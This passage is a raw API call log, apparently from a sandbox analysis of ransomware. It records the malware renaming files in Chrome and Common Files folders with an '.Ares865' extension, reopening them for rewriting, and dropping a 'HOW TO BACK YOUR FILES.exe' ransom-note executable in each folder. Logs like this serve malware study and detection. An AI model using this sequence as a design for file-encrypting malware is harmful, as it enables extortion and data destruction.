(lpString="drive.crx") returned 9 [0145.075] lstrlenW (lpString="Ares865") returned 7 [0145.075] lstrcmpiW (lpString1="ive.crx", lpString2="Ares865") returned 1 [0145.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx.Ares865") returned 93 [0145.076] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx.ares865"), dwFlags=0x1) returned 1 [0145.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.078] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25561) returned 1 [0145.082] lstrcpyW (in: lpString1=0x2cce498, lpString2="external_extensions.json" | out: lpString1="external_extensions.json") returned="external_extensions.json" [0145.082] lstrlenW (lpString="external_extensions.json") returned 24 [0145.082] lstrlenW (lpString="Ares865") returned 7 [0145.082] lstrcmpiW (lpString1="ns.json", lpString2="Ares865") returned 1 [0145.082] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json.Ares865") returned 108 [0145.082] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json.ares865"), dwFlags=0x1) returned 1 [0145.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.084] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1266) returned 1 [0145.087] lstrcpyW (in: lpString1=0x2cce498, lpString2="gmail.crx" | out: lpString1="gmail.crx") returned="gmail.crx" [0145.087] lstrlenW (lpString="gmail.crx") returned 9 [0145.087] lstrlenW (lpString="Ares865") returned 7 [0145.087] lstrcmpiW (lpString1="ail.crx", lpString2="Ares865") returned -1 [0145.087] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx.Ares865") returned 93 [0145.087] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx.ares865"), dwFlags=0x1) returned 1 [0145.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.089] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24040) returned 1 [0145.093] lstrcpyW (in: lpString1=0x2cce498, lpString2="youtube.crx" | out: lpString1="youtube.crx") returned="youtube.crx" [0145.093] lstrlenW (lpString="youtube.crx") returned 11 [0145.093] lstrlenW (lpString="Ares865") returned 7 [0145.093] lstrcmpiW (lpString1="ube.crx", lpString2="Ares865") returned 1 [0145.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx.Ares865") returned 95 [0145.093] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx.ares865"), dwFlags=0x1) returned 1 [0145.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\youtube.crx.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\youtube.crx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23668) returned 1 [0145.099] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files") returned="C:\\Program Files (x86)\\Common Files" [0145.100] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files" | out: lpString1="C:\\Program Files (x86)\\Common Files") returned="C:\\Program Files (x86)\\Common Files" [0145.100] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0145.100] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0145.100] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0145.101] GetLastError () returned 0x0 [0145.101] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0145.101] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53427280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0145.101] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0145.101] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0145.102] lstrcpyW (in: lpString1=0x2cce448, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0145.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78e8 [0145.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df710 [0145.102] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78f0 | out: ListHead=0x2e7710, ListEntry=0x2e78f0) returned 0x2e78d0 [0145.102] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53427280, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0145.102] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0145.102] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0145.102] lstrcmpiW (lpString1="Java", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.102] lstrcmpiW (lpString1="Java", lpString2="aoldtz.exe") returned 1 [0145.102] lstrcpyW (in: lpString1=0x2cce448, lpString2="Java" | out: lpString1="Java") returned="Java" [0145.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0145.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df770 [0145.102] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0145.102] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5350bac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0145.102] lstrcmpiW (lpString1="microsoft shared", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.102] lstrcmpiW (lpString1="microsoft shared", lpString2="aoldtz.exe") returned 1 [0145.103] lstrcpyW (in: lpString1=0x2cce448, lpString2="microsoft shared" | out: lpString1="microsoft shared") returned="microsoft shared" [0145.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0145.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2e4710 [0145.103] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0145.103] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5350bac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0145.103] lstrcmpiW (lpString1="Services", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.103] lstrcmpiW (lpString1="Services", lpString2="aoldtz.exe") returned 1 [0145.103] lstrcpyW (in: lpString1=0x2cce448, lpString2="Services" | out: lpString1="Services") returned="Services" [0145.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0145.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f1fc8 [0145.103] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0145.103] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0145.103] lstrcmpiW (lpString1="SpeechEngines", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.103] lstrcmpiW (lpString1="SpeechEngines", lpString2="aoldtz.exe") returned 1 [0145.103] lstrcpyW (in: lpString1=0x2cce448, lpString2="SpeechEngines" | out: lpString1="SpeechEngines") returned="SpeechEngines" [0145.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0145.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d2ef0 [0145.103] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0145.103] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0145.103] lstrcmpiW (lpString1="System", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.104] lstrcmpiW (lpString1="System", lpString2="aoldtz.exe") returned 1 [0145.104] lstrcpyW (in: lpString1=0x2cce448, lpString2="System" | out: lpString1="System") returned="System" [0145.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0145.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x56) returned 0x2df7d0 [0145.104] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0145.104] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0145.104] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0145.104] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0145.104] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System") returned="C:\\Program Files (x86)\\Common Files\\System" [0145.104] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System") returned="C:\\Program Files (x86)\\Common Files\\System" [0145.104] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0145.104] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\how to back your files.exe"), bFailIfExists=1) returned 0 [0145.105] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0145.106] GetLastError () returned 0x0 [0145.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0145.106] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0145.106] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0145.106] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0145.106] lstrcpyW (in: lpString1=0x2cce456, lpString2="ado" | out: lpString1="ado") returned="ado" [0145.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0145.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f2030 [0145.107] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0145.107] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886e43c6, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x886e43c6, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x89202410, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0145.107] lstrcmpiW (lpString1="DirectDB.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0145.107] lstrcmpiW (lpString1="DirectDB.dll", lpString2="aoldtz.exe") returned 1 [0145.107] lstrcpyW (in: lpString1=0x2cce456, lpString2="DirectDB.dll" | out: lpString1="DirectDB.dll") returned="DirectDB.dll" [0145.107] lstrlenW (lpString="DirectDB.dll") returned 12 [0145.107] lstrlenW (lpString="Ares865") returned 7 [0145.107] lstrcmpiW (lpString1="tDB.dll", lpString2="Ares865") returned 1 [0145.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll.Ares865") returned 63 [0145.107] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll.ares865"), dwFlags=0x1) returned 1 [0145.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.110] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24064) returned 1 [0145.114] lstrcpyW (in: lpString1=0x2cce456, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0145.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0145.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d2f60 [0145.114] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0145.114] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5344d3e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0145.114] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0145.114] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53473540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53473540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0145.114] lstrcmpiW (lpString1="msadc", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.114] lstrcmpiW (lpString1="msadc", lpString2="aoldtz.exe") returned 1 [0145.114] lstrcpyW (in: lpString1=0x2cce456, lpString2="msadc" | out: lpString1="msadc") returned="msadc" [0145.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0145.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d2fd0 [0145.114] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0145.114] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0145.114] lstrcmpiW (lpString1="Ole DB", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.115] lstrcmpiW (lpString1="Ole DB", lpString2="aoldtz.exe") returned 1 [0145.115] lstrcpyW (in: lpString1=0x2cce456, lpString2="Ole DB" | out: lpString1="Ole DB") returned="Ole DB" [0145.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0145.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d3040 [0145.115] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0145.115] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2406d7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8c2406d7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb04ef6b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xad000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0145.115] lstrcmpiW (lpString1="wab32.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.115] lstrcmpiW (lpString1="wab32.dll", lpString2="aoldtz.exe") returned 1 [0145.115] lstrcpyW (in: lpString1=0x2cce456, lpString2="wab32.dll" | out: lpString1="wab32.dll") returned="wab32.dll" [0145.115] lstrlenW (lpString="wab32.dll") returned 9 [0145.115] lstrlenW (lpString="Ares865") returned 7 [0145.115] lstrcmpiW (lpString1="b32.dll", lpString2="Ares865") returned 1 [0145.116] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\wab32.dll.Ares865") returned 60 [0145.116] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\wab32.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\wab32.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\wab32.dll.ares865"), dwFlags=0x1) returned 1 [0145.117] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\wab32.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\wab32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.117] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=708608) returned 1 [0145.154] lstrcpyW (in: lpString1=0x2cce456, lpString2="wab32res.dll" | out: lpString1="wab32res.dll") returned="wab32res.dll" [0145.154] lstrlenW (lpString="wab32res.dll") returned 12 [0145.154] lstrlenW (lpString="Ares865") returned 7 [0145.154] lstrcmpiW (lpString1="res.dll", lpString2="Ares865") returned 1 [0145.155] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll.Ares865") returned 63 [0145.155] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files (x86)\\common files\\system\\wab32res.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\wab32res.dll.ares865"), dwFlags=0x1) returned 1 [0145.157] CreateFileW 